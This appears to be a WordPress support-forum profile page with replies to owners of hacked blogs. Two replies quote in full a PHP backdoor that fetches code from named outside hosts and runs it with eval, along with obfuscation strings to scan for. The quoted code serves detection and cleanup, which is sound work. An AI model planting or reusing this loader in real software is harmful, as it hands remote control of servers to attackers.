evermaster
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Please Help! My blog is saying “Warning: file_get_contents()”Here is the full list of hijacked domains:
Forum: Fixing WordPress
In reply to: Please Help! My blog is saying “Warning: file_get_contents()”Your blog was highjacked and you must have webshells installed on your blog as well. I can help you, please cut and paste your
/home/content/m/u/s/musicisartx/html/wp-includes/general-template.php here
I will fix it for you. If you want me to remove shells – let me know – leave your contact information here as well.
Forum: Fixing WordPress
In reply to: WordPress Hacked and Redirected … AgainThose are VERY dangerous:
Make sure you scan ALL your files for following words in your code:
if(isset($_GET['p'])) { $sock = @fsockopen('km20725.keymachine.de', 80); if($sock){ fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); @eval(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} }if(isset($_GET['p'])) { @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'])); }if(isset($_GET['p'])) { @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'])); }`
eval(gzinflate(base64_decode(
words:k1b0rg in any of your files.
Once found clean it up!
hey and dont forget to send nice abuse emails to ISP of those guys:
km20725.keymachine.de
beliy.us
seogoogle.usForum: Fixing WordPress
In reply to: I was hackedThose are VERY dangerous:
Make sure you scan ALL your files for following words in your code:
if(isset($_GET['p'])) { $sock = @fsockopen('km20725.keymachine.de', 80); if($sock){ fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); @eval(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} }if(isset($_GET['p'])) { @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'])); }if(isset($_GET['p'])) { @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'])); }eval(gzinflate(base64_decode(words:
k1b0rg in any of your files.
Once found clean it up!
If you have broken fingers and want someone to clean it up for you – ring me a bell : icq 119655677
hey and dont forget to send nice abuse emails to ISP of those guys:
km20725.keymachine.de
beliy.us
seogoogle.us